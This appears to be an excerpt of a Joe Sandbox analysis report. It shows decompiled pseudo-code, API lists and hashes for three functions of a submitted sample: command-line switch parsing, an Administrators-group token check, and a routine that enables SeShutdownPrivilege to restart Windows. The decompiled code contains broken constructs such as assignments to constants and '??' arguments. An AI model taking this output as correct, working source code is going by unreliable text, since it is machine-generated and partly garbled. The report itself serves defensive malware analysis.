Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: b0b38c66b082e0905e419554b33de7d16879ddf5ebe373c5c57c37f383a11f06
Instruction ID: abefb79a57876cb5de74f9f013dc219be1324996fd6a17de1daa9f629e52e6ce
Opcode Fuzzy Hash: b0b38c66b082e0905e419554b33de7d16879ddf5ebe373c5c57c37f383a11f06
Instruction Fuzzy Hash: 66B0123100010CF78F001B52EC088453F5DE6C52607000010F50C418218B339811C585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008A5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E008A5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E008A6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E008A6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x8a8004; // 0x8481bc1d
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E008A597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E008A44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x8a9124 = E008A6285();
									_t75 = 0;
								}
								return E008A6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E008A44B9(0, 0x521, 0x8a1140, 0, 0x40, 0);
												_t85 =  *0x8a8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E008A667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E008A667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E008A5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E008A1680(0x8a8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E008A667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E008A667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x8a8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E008A5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x8a8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x8a8a3a;
																}
																E008A1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E008A658A(_t218, 0x104, 0x8a1140);
																if(E008A31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x8a8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x8a8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x8a8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x8a8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x8a8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x8a9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x8a9a2c =  *0x8a9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x8a8d48 =  *0x8a8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x8a9a2c =  *0x8a9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x8a9a2c =  *0x8a9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x8a8d48 =  *0x8a8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x8a9a2c =  *0x8a9a2c | 0x00000004;
																										L70:
																										 *0x8a8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x8a9a2c = 3;
																	 *0x8a8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x8a8a2c != 0 &&  *0x8a8b3e == 0) {
						if(GetModuleFileNameA( *0x8a9a3c, 0x8a8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E008A66C8(0x8a8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x008a5c9e
0x008a5ca9
0x008a5cb0
0x008a5cb3
0x008a5cb6
0x008a5cb7
0x008a5cb8
0x008a5cbd
0x008a6204
0x008a5ccb
0x00000000
0x008a5ccb
0x008a5cd3
0x008a5cd7
0x008a5cf4
0x00000000
0x008a5cf4
0x008a5cf8
0x008a5d00
0x00000000
0x008a5d06
0x008a5d06
0x008a5d0e
0x008a5d10
0x008a5d12
0x008a5d14
0x008a5d15
0x008a5d17
0x008a5d49
0x00000000
0x00000000
0x00000000
0x00000000
0x008a5d19
0x008a5d19
0x008a5d1d
0x00000000
0x008a5d3f
0x008a5d3f
0x008a5d4b
0x008a5d4b
0x008a5d4f
0x008a5d8d
0x00000000
0x008a5d93
0x008a5d93
0x008a5d9a
0x008a5d9d
0x008a5d9e
0x00000000
0x008a5d9e
0x008a5d51
0x008a5d5b
0x008a5d72
0x008a60fb
0x008a60fb
0x008a6207
0x008a620a
0x008a620b
0x008a620e
0x008a6217
0x008a5d78
0x008a5d78
0x008a5d80
0x008a5d83
0x008a5d84
0x00000000
0x008a5d84
0x008a5d5d
0x008a5d5f
0x008a5d62
0x008a5d68
0x008a5d64
0x008a5d64
0x008a5d64
0x00000000
0x008a5d62
0x008a5d5b
0x008a5d4f
0x008a5d1d
0x00000000
0x008a5d9f
0x008a5d9f
0x008a5da5
0x008a5dab
0x008a5dba
0x008a6218
0x008a621d
0x008a6220
0x008a6221
0x008a6229
0x008a6230
0x008a6247
0x008a626a
0x008a6272
0x008a6249
0x008a6255
0x008a625f
0x008a6264
0x008a6264
0x008a6284
0x008a5dc0
0x008a5dc0
0x008a5dca
0x008a5e22
0x00000000
0x00000000
0x00000000
0x00000000
0x008a5dcc
0x008a5dce
0x008a5e24
0x008a5e24
0x008a5e2c
0x008a5e47
0x008a5e4a
0x008a61d2
0x008a61e2
0x008a61e7
0x008a61ee
0x008a61f1
0x008a61f1
0x008a61f8
0x008a61f8
0x008a5e50
0x008a5e53
0x008a6109
0x008a611f
0x00000000
0x008a6125
0x008a6137
0x008a613a
0x008a613c
0x008a613e
0x008a613e
0x008a6141
0x008a6141
0x008a6143
0x008a6144
0x008a614a
0x00000000
0x008a6150
0x008a6152
0x008a615c
0x008a6170
0x008a6172
0x008a617c
0x008a6190
0x008a6190
0x008a6196
0x008a61a5
0x00000000
0x008a61ab
0x008a61b9
0x008a61c6
0x008a61c6
0x008a617e
0x008a6180
0x008a618a
0x00000000
0x00000000
0x00000000
0x00000000
0x008a618a
0x008a615e
0x008a6160
0x008a616a
0x00000000
0x00000000
0x00000000
0x00000000
0x008a616a
0x008a615c
0x008a614a
0x008a610b
0x008a610e
0x008a610e
0x00000000
0x008a5e59
0x008a5e59
0x008a5e5c
0x008a604f
0x008a6056
0x00000000
0x008a605c
0x008a606e
0x008a6071
0x008a6073
0x008a6075
0x008a6075
0x008a6078
0x008a6078
0x008a607a
0x008a607b
0x008a6081
0x00000000
0x008a6087
0x008a6087
0x008a608d
0x008a609c
0x00000000
0x008a60a2
0x008a60aa
0x008a60b2
0x008a60b7
0x008a60bd
0x008a60bf
0x008a60bf
0x008a60d6
0x008a60e0
0x008a60e7
0x008a60f5
0x00000000
0x00000000
0x00000000
0x00000000
0x008a60f5
0x008a609c
0x008a6081
0x008a5e62
0x008a5e62
0x008a5e65
0x008a5fd3
0x008a5fe9
0x00000000
0x008a5fef
0x008a5fef
0x008a5ff7
0x008a5ffd
0x008a6003
0x008a6006
0x008a6011
0x008a6014
0x008a603d
0x008a6016
0x008a6018
0x008a6019
0x008a601b
0x008a6033
0x008a601d
0x008a6020
0x008a6029
0x008a6022
0x008a6022
0x008a6022
0x008a6020
0x008a601b
0x008a6042
0x008a6044
0x008a6046
0x008a604a
0x008a5ff7
0x008a5fd5
0x008a5fd8
0x008a5fd8
0x00000000
0x008a5e6b
0x008a5e6b
0x008a5e6e
0x008a5f8b
0x008a5f99
0x00000000
0x008a5f9f
0x008a5fa7
0x008a5faf
0x00000000
0x008a5fb1
0x008a5fb3
0x00000000
0x008a5fb5
0x008a5fb7
0x00000000
0x008a5fb9
0x00000000
0x008a5fb9
0x008a5fb7
0x008a5fb3
0x008a5faf
0x008a5f8d
0x008a5f8d
0x008a5f8d
0x008a5f8f
0x008a5fc1
0x008a5fc1
0x008a5fc1
0x00000000
0x008a5e74
0x008a5e74
0x008a5e77
0x008a5ea0
0x008a5ebd
0x008a5f79
0x00000000
0x008a5f7f
0x008a5ec3
0x008a5ec3
0x008a5ecc
0x008a5ed4
0x008a5ed6
0x008a5edc
0x008a5edf
0x008a5eea
0x008a5eed
0x008a5f3f
0x008a5f40
0x00000000
0x008a5eef
0x008a5eef
0x008a5ef2
0x008a5f34
0x008a5ef4
0x008a5ef4
0x008a5ef7
0x008a5f2b
0x00000000
0x008a5ef9
0x008a5ef9
0x008a5efc
0x008a5f22
0x00000000
0x008a5efe
0x008a5eff
0x008a5f02
0x008a5f16
0x008a5f04
0x008a5f07
0x008a5f0d
0x008a5f46
0x008a5f46
0x008a5f09
0x008a5f09
0x008a5f09
0x008a5f07
0x008a5f02
0x008a5efc
0x008a5ef7
0x008a5ef2
0x008a5f4c
0x008a5f4e
0x008a5f50
0x008a5f54
0x008a5ed4
0x008a5ea2
0x008a5ea4
0x008a5eaf
0x008a5eaf
0x00000000
0x008a5e79
0x008a5e7d
0x00000000
0x008a5e83
0x008a5e83
0x008a5e83
0x008a5e85
0x008a5e85
0x008a5e8e
0x00000000
0x008a5e94
0x00000000
0x008a5e94
0x008a5e8e
0x008a5e7d
0x008a5e77
0x008a5e6e
0x008a5e65
0x008a5e5c
0x00000000
0x00000000
0x00000000
0x008a5dd0
0x008a5dd0
0x008a5dd0
0x00000000
0x008a5dd0
0x008a5dce
0x008a5dca
0x008a5dba
0x00000000
0x008a5d00
0x008a5dd9
0x008a5e04
0x008a61fe
0x008a5e0a
0x008a5e0c
0x008a5e17
0x008a5e17
0x008a5e04
0x008a6200
0x008a6200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 008A5CEE
GetModuleFileNameA.KERNEL32(008A8B3E,00000104,00000000,?,?), ref: 008A5DFC
CharUpperA.USER32(?), ref: 008A5E3E
CharUpperA.USER32(-00000052), ref: 008A5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 008A5F6F
CharUpperA.USER32(?), ref: 008A5FA7
CharUpperA.USER32(-0000004E), ref: 008A6008
CharUpperA.USER32(?), ref: 008A60AA
CloseHandle.KERNEL32(00000000,008A1140,00000000,00000040,00000000), ref: 008A61F1
ExitProcess.KERNEL32 ref: 008A61F8

Strings

RegServer, xrefs: 008A5F66
", xrefs: 008A5D78
:, xrefs: 008A6118
", xrefs: 008A612D

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 903866fa012ef27ca93ac1c82e6e6bcfda9508268b9e60b980431488e5cd80f8
Instruction ID: 0735b397a05a833db1ff068adf79b0f249632b4ed9e17a65d58d1a78def31358
Opcode Fuzzy Hash: 903866fa012ef27ca93ac1c82e6e6bcfda9508268b9e60b980431488e5cd80f8
Instruction Fuzzy Hash: 75D15A71A04A589EFF358B388C487BA3B61FB17304F1800AAD496D6D95EB748ED6CB11

Uniqueness

Uniqueness Score: -1.00%

Function 008A18A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E008A18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t23 ^ _t53;
				_t25 =  *0x8a8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E008A6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E008A17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x8a8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x8a8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x008a18a3
0x008a18a3
0x008a18ab
0x008a18b2
0x008a18b5
0x008a18be
0x008a18c0
0x008a18c6
0x008a18c7
0x008a18ca
0x008a18cf
0x008a19c9
0x008a19d8
0x008a19d8
0x008a18df
0x008a19b8
0x008a19bd
0x008a19bf
0x008a19bf
0x00000000
0x008a19bd
0x008a18fa
0x00000000
0x00000000
0x008a1912
0x008a19aa
0x008a19ad
0x008a19b3
0x00000000
0x008a1927
0x008a1927
0x008a1932
0x008a1936
0x008a19a9
0x008a19a9
0x00000000
0x008a19a9
0x008a194c
0x008a19a2
0x008a19a3
0x00000000
0x008a196e
0x008a1970
0x008a1999
0x008a199c
0x00000000
0x008a199c
0x008a1972
0x008a1972
0x008a1975
0x008a1984
0x008a1985
0x008a198a
0x00000000
0x00000000
0x00000000
0x008a198c
0x008a1991
0x008a1996
0x00000000
0x008a1996
0x008a194c

APIs

Part of subcall function 008A17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008A18DD), ref: 008A181A
Part of subcall function 008A17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 008A182C
Part of subcall function 008A17EE: AllocateAndInitializeSid.ADVAPI32(008A18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008A18DD), ref: 008A1855
Part of subcall function 008A17EE: FreeSid.ADVAPI32(?,?,?,?,008A18DD), ref: 008A1883
Part of subcall function 008A17EE: FreeLibrary.KERNEL32(00000000,?,?,?,008A18DD), ref: 008A188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 008A18EB
OpenProcessToken.ADVAPI32(00000000), ref: 008A18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 008A190A
GetLastError.KERNEL32 ref: 008A1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 008A192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 008A1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008A1964
EqualSid.ADVAPI32(00000004,?), ref: 008A197A
FreeSid.ADVAPI32(?), ref: 008A199C
LocalFree.KERNEL32(00000000), ref: 008A19A3
CloseHandle.KERNEL32(?), ref: 008A19AD

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 4f7749f8c2287de2b8c04b6afc671409857361b291cbfc9ce9c49a68adcaca36
Instruction ID: 94d8e0e61ae2c0cfe360c34f80d79833ce2fcbeda810b92c0c31aa360549a306
Opcode Fuzzy Hash: 4f7749f8c2287de2b8c04b6afc671409857361b291cbfc9ce9c49a68adcaca36
Instruction Fuzzy Hash: 3A311C71A00609EFFF109FA5DC98AAFBBBDFF0A700F540425E645D2950EB319905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008A1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E008A1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x8a9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x8a8004; // 0x8481bc1d
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E008A44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E008A6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E008A44B9(0, 0x522, 0x8a1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E008A1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x008a1f90
0x008a1f90
0x008a1f93
0x008a1f98
0x008a1fa4
0x008a1fa7
0x008a1fc5
0x008a1fcd
0x008a1fdb
0x008a1ee5
0x008a1eea
0x008a1ef1
0x008a1ef4
0x008a1f0c
0x008a1f2e
0x008a1f3a
0x008a1f46
0x008a1f4d
0x008a1f58
0x008a1f60
0x008a1f61
0x008a1f62
0x008a1f75
0x008a1f80
0x008a1f77
0x008a1f77
0x00000000
0x008a1f77
0x008a1f64
0x008a1f64
0x00000000
0x008a1f64
0x008a1f0e
0x008a1f0e
0x008a1f13
0x008a1f13
0x008a1f14
0x008a1f14
0x008a1f16
0x008a1f17
0x008a1f1a
0x008a1f1f
0x008a1f1f
0x008a1f86
0x008a1f8f
0x008a1fcf
0x008a1fd3
0x00000000
0x008a1fd3
0x008a1fa9
0x008a1fb4
0x008a1fbb
0x008a1fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x008a1fc3
0x008a1f9a
0x008a1f9a
0x008a1fa2
0x008a1fd9
0x008a1fda
0x00000000
0x00000000
0x00000000
0x008a1fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 008A1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 008A1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 008A1FD3

Strings

SeShutdownPrivilege, xrefs: 008A1F28

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: fb3f2aa8c7f3f33012e1b25600ccdd1936822302cf2f4683d2e8978fd0ffabb3
Instruction ID: 191564ec88960671c15ff6c5c6c6fd43d308a89d2a5db05dd4f1e5ad080f3a01
Opcode Fuzzy Hash: fb3f2aa8c7f3f33012e1b25600ccdd1936822302cf2f4683d2e8978fd0ffabb3
